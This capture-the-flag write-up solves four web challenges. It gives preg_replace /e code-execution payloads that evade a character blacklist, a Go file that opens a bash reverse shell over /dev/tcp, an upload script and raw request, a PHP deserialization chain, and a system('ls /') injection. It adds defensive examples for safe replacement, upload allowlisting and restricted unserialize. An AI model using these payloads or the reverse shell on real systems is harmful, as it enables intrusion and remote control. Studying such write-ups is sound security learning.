WEB
0x01 Web – ezrce
Challenge
```php
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>钥匙呢?</title>
</head>
<body>
<!--
admin's key was snatched by his robot!
-->
<form action="" method="post" name="name">
you name:<input name="name" type="text" value="" />
<input type="submit" value="submit" />
<br/>
</form>
<form action="" method="get" name="key">
your key:<input name="key" type="text" value="" />
<input type="submit" value="submit" />
<br/>
</form>
<?php
error_reporting(0);
include 'waf.php';
header("Content-Type:text/html;charset=utf-8");
echo "你是谁啊哥们?把钥匙给我!!!!<br/>";
$key=$_GET['key'];
$name=$_POST['name'];
$qaq=waf($_POST['qaq']);
if (isset($_GET['key'])){
highlight_file(__FILE__);
}
if (isset($name))
{
echo "你是".$name."大人????<br/>";
$name1=preg_replace('/hahaha/e',$qaq,$name);
echo "骗我的吧,你明明是 >>>>小小".$name1;
}
?>
```
The key exploitation point is this line: `$name1=preg_replace('/hahaha/e',$qaq,$name);`. The `/e` modifier makes preg_replace() evaluate the replacement string as PHP code for every match, and `$qaq` comes straight from the POST body (after passing through waf()), so the request controls what gets executed.
The request needs the POST parameters `qaq` and `name` and the GET parameter `key` (`key` only triggers highlight_file(), which is how the source above was obtained).
Main reference: https://www.freebuf.com/articles/system/242482.html
The article explains it in detail; array_rand() is used to read a random file from the directory listing.
- first payload:

```
name=hahaha&qaq=readfile(array_rand(array_flip(scandir(getcwd()))));
```

This successfully reads the contents of waf.php.
Only the tail of the waf.php output survived on the page, followed by the rest of the page's response. The trailing `300` is readfile()'s return value (the number of bytes it output), which `/e` substitutes in place of `hahaha`:

```
|\/|\?|\\\\/i", $poc)){ echo "hacker! you die!
"; return "666"; } return $poc; } 骗我的吧,你明明是 >>>>小小300
```
Modify the original payload: since the WAF rejects `/` and `?`, the path cannot be written literally, so three dirname() calls walk back to the root directory and array_rand() again picks a random file to read.
- final payload:

```
name=hahaha&qaq=readfile(array_rand(array_flip(scandir(dirname(chdir(dirname(dirname(dirname(getcwd())))))))))
```

The file read is random, so send it a few times and the flag comes out.
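The following is an added example, not the challenge's code or the reference article's: it writes the "replace hahaha" step the vulnerable way and the safe way, and puts a hypothetical stand-in for waf() next to them (only the tail of the real regex is on the page). Running it with `php file.php` shows why the blacklist is irrelevant to the bug and what the fix looks like; type declarations are omitted so it also runs on the PHP 5 versions where `/e` still works.

```php
<?php
// Added example, not code from the challenge: the "replace hahaha" step
// written the vulnerable way and the safe way, plus a stand-in for the
// character blacklist in waf.php. No type declarations on purpose, so the
// script also runs on the PHP 5 versions where /e still works.

// 1. What the challenge does. With the /e modifier, preg_replace() eval()s
//    the replacement string for every match (after substituting
//    backreferences into it) and uses the expression's return value as the
//    replacement text. $qaq comes straight from the request, so the request
//    chooses the code. PHP 5.5 deprecated /e and PHP 7.0 removed it: on
//    7+ the call emits a warning and returns NULL without evaluating anything.
function replace_with_e($name, $replacement)
{
    return @preg_replace('/hahaha/e', $replacement, $name);
}

// 2. The replacement PHP recommends. preg_replace_callback() calls a closure
//    that you wrote; the user's string is only ever a value inside it and
//    is never parsed as code.
function replace_safely($name, $replacement)
{
    return preg_replace_callback(
        '/hahaha/',
        function ($m) use ($replacement) {
            return $replacement;   // plain text, whatever it contains
        },
        $name
    );
}

// 3. Hypothetical stand-in for waf(): the page only preserves the tail of
//    its regex, which rejects "/", "?" and "\". Blocking characters does not
//    stop evaluation; function names such as dirname() and getcwd() use
//    none of them, which is why the writeup's payload passes.
function blacklist_waf($poc)
{
    if (preg_match('/\/|\?|\\\\/i', $poc)) {
        return '666';
    }
    return $poc;
}

$name = 'hahaha';

// A harmless expression stands in for the real payload: on PHP 5 it is
// evaluated and "hahaha" becomes "EVALUATED"; on PHP 7+ the result is NULL.
$expr = 'strtoupper("evaluated")';
echo 'PHP ', PHP_VERSION, "\n";
echo '/e result:       ', var_export(replace_with_e($name, $expr), true), "\n";
echo 'callback result: ', replace_safely($name, $expr), "\n";

// The blacklist blocks a literal path but not a function call that builds one.
foreach (['../flag', 'dirname(getcwd())'] as $poc) {
    echo str_pad($poc, 18), ' -> ', blacklist_waf($poc) === '666' ? 'blocked' : 'passes', "\n";
}
```

The practical check for a code base is therefore not the WAF but the PHP version and the pattern: any `preg_replace()` whose pattern ends in an `e` flag is an eval of the replacement, and on PHP 7 or later the same call silently returns NULL, which is a different bug (lost output) rather than a fix of the design.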
0x02 WEB - test
Viewing the page source reveals the route /profile/index; visiting it returns a result. Trying /profile/admin returns an MD5 hash, which cracks to asdfgh123. Logging in as admin shows a prompt saying that an uploaded go file will be run, so build an upload request. The go file is as follows:
```go
package main

import (
	"fmt"
	"log"
	"os/exec"
)

func main() {
	cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
	out, err := cmd.CombinedOutput()
	if err != nil {
		fmt.Printf("combined out:\n%s\n", string(out))
		log.Fatalf("cmd.Run() failed with %s\n", err)
	}
	fmt.Printf("combined out:\n%s\n", string(out))
}
```
The upload script is as follows:

```python
import requests

url = 'http://1a059500.clsadp.com/Adm1nUp104d'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36',
    'Referer': 'http://1a059500.clsadp.com/'
}
file_path = r'file.go'
with open(file_path, 'rb') as file:
    file_data = file.read()
# requests builds the multipart body; the tuple is (filename, content, content-type)
data = {
    'file': ('123.go', file_data, 'application/octet-stream'),
    'submit': 'submit_file'
}
response = requests.post(url, headers=headers, files=data)
print(response.text)
```
The upload request is as follows:

```http
POST /Adm1nUp104d HTTP/1.1
Host: 8e50756d.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://8e50756d.clsadp.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydX4dGEAJZUS6ZqkT

------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="file"; filename="123.go"
Content-Type: application/octet-stream

package main
import (
"fmt"
"log"
"os/exec"
)
func main() {
cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
out, err := cmd.CombinedOutput()
if err != nil {
fmt.Printf("combined out:\n%s\n", string(out))
log.Fatalf("cmd.Run() failed with %s\n", err)
}
fmt.Printf("combined out:\n%s\n", string(out))
}
------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="submit"

submit_file
------WebKitFormBoundarydX4dGEAJZUS6ZqkT--
```
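The target accepted whatever file arrived in that request and executed it. As an added example (not the challenge's code), here is the kind of upload handler that would have stopped it: an allowlist of data formats checked against every extension in the name, a file-signature check instead of trusting the client's Content-Type, and a random stored name. The `$_FILES`-style arrays and file contents are constructed inline so the script runs from the CLI (PHP 7.1 or later) without a web server.

```php
<?php
// Added example, not code from the challenge: an allowlist check for an
// upload like the one in the request above. The uploads it accepts should
// still be written to a directory the web server neither serves nor executes.

// Allowed extension => expected leading bytes (file signature).
$ALLOWED = [
    'png' => "\x89PNG\r\n\x1a\n",
    'jpg' => "\xFF\xD8\xFF",
    'pdf' => '%PDF-',
];

function validate_upload(array $file, array $allowed)
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'transport error or no file'];
    }
    $name = basename((string) $file['name']);
    // Check every extension, so "shell.php.png" fails as surely as "123.go".
    $parts = explode('.', strtolower($name));
    array_shift($parts);   // drop the base name
    if ($parts === []) {
        return [false, 'no extension'];
    }
    foreach ($parts as $ext) {
        if (!isset($allowed[$ext])) {
            return [false, "extension .$ext is not allowed"];
        }
    }
    $ext = end($parts);
    // The client's Content-Type is attacker-controlled; look at the bytes instead.
    $sig  = $allowed[$ext];
    $head = file_get_contents($file['tmp_name'], false, null, 0, strlen($sig));
    if ($head !== $sig) {
        return [false, "content does not look like .$ext"];
    }
    // Never keep the user's name: a random one defeats path tricks and guessing.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    return [true, $stored];
}

// Constructed sample uploads written to temp files so the check can read them.
function fake_upload($name, $bytes)
{
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    return ['name' => $name, 'tmp_name' => $tmp, 'error' => UPLOAD_ERR_OK];
}

$samples = [
    fake_upload('123.go', "package main\n"),                              // the request above
    fake_upload('shell.php.png', "\x89PNG\r\n\x1a\n"),                     // double extension
    fake_upload('avatar.png', "<?php echo 1; ?>"),                         // wrong bytes
    fake_upload('avatar.png', "\x89PNG\r\n\x1a\n" . str_repeat("\0", 16)), // accepted
];
foreach ($samples as $f) {
    [$ok, $info] = validate_upload($f, $ALLOWED);
    printf("%-16s %s %s\n", $f['name'], $ok ? 'ACCEPT' : 'REJECT', $info);
    unlink($f['tmp_name']);
}
```

Only the last sample is accepted; the first three are rejected at the extension or signature check, and the accepted file gets a name the uploader never learns.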
0x03 WEB-pop
The EXP is as follows (the classes are copied from the challenge with their methods stripped, which is all serialize() needs to build the chain):

```php
<?php
highlight_file(__FILE__);
error_reporting(E_ALL);
ini_set('display_errors', 1);
class night
{
public $night;
}
class day
{
public $day;
}
class light
{
public $light;
}
class dark
{
public $dark;
}
$a = new night();
$a -> night = new day();
$a -> night -> day = new dark();
$a -> night -> day -> dark = new light();
$a -> night -> day -> dark -> light = new day();
$a -> night -> day -> dark -> light -> day = new dark();
$a -> night -> day -> dark -> light -> day -> dark = 'ls';
// serialize before unset(): after unset($a) serialize($a) would only give "N;"
echo urlencode(serialize($a))."\n";
unset($a);
$un = '快给我传参pop';
echo urlencode($un);
?>
```
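The chain above only works because the receiving side calls unserialize() on request data with every class allowed. As an added example (not the challenge's solution), the same four classes are serialized the way the EXP does and then loaded three ways; the `__wakeup()` in `dark` is a hypothetical stand-in for the sink, since the challenge's real magic methods are not shown on the page. It needs PHP 7.0 or later for the `allowed_classes` option.

```php
<?php
// Added example, not the challenge's code: the writeup's class chain loaded
// with and without allowed_classes, to show what a consumer of untrusted
// serialized data should do.
class night { public $night; }
class day   { public $day; }
class light { public $light; }
class dark  {
    public $dark;
    // Hypothetical sink: fires when a real dark object is restored.
    public function __wakeup() {
        if (is_string($this->dark)) {
            echo "[sink reached] would run: ", $this->dark, "\n";
        }
    }
}

function build_chain()
{
    $a = new night();
    $a->night = new day();
    $a->night->day = new dark();
    $a->night->day->dark = new light();
    $a->night->day->dark->light = new day();
    $a->night->day->dark->light->day = new dark();
    $a->night->day->dark->light->day->dark = 'ls';
    return serialize($a);   // serialize while $a is still alive
}

// Unsafe: every class named in the payload is instantiated, so the chain is live.
function load_unsafe($blob)
{
    return unserialize($blob);
}

// Safe default: no class may be instantiated. Objects come back as
// __PHP_Incomplete_Class, whose magic methods never run.
function load_safe($blob)
{
    return unserialize($blob, ['allowed_classes' => false]);
}

// Middle ground when one specific class genuinely has to be restored:
// everything nested inside it is still incomplete.
function load_allowlist($blob)
{
    return unserialize($blob, ['allowed_classes' => ['night']]);
}

$blob = build_chain();
echo "serialized: ", $blob, "\n";

echo "--- unsafe ---\n";
$obj = load_unsafe($blob);            // prints "[sink reached] would run: ls"
echo get_class($obj), "\n";

echo "--- safe ---\n";
$obj = load_safe($blob);              // nothing printed by the sink
echo get_class($obj), "\n";           // __PHP_Incomplete_Class

echo "--- allowlist (night only) ---\n";
$obj = load_allowlist($blob);         // nothing printed by the sink
echo get_class($obj), " -> ", get_class($obj->night), "\n";
```

If the data format is under your control, the stronger fix is to stop using PHP serialization for anything that crosses a trust boundary and use JSON with explicit field validation instead; `allowed_classes` is the mitigation for code you cannot rewrite.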
0x04 WEB - unserialize
Just pass the parameter directly: `?a=system("ls /")`